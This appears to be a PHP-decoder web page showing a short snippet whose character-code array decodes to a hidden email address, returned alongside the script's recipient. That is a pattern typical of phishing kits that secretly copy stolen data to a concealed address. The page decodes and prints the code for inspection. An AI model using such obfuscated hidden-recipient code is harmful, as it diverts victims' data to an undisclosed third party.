Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$sorter = ""; $array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,105,..
Decoded Output download
<? $sorter = "";
$array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,105,108,46,99,111,109);
$count = count($array);
for ($i = 0; $i < $count; $i++) {
$sorter .= chr($array[$i]);
}
return array($sorter, $GLOBALS['recipient']); ?>
Did this file decode correctly?
Original Code
$sorter = "";
$array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,105,108,46,99,111,109);
$count = count($array);
for ($i = 0; $i < $count; $i++) {
$sorter .= chr($array[$i]);
}
return array($sorter, $GLOBALS['recipient']);
Function Calls
| chr | 21 |
| count | 1 |
Stats
| MD5 | 36b6b4ac1b62103a33ae543c4f90a853 |
| Eval Count | 0 |
| Decode Time | 144 ms |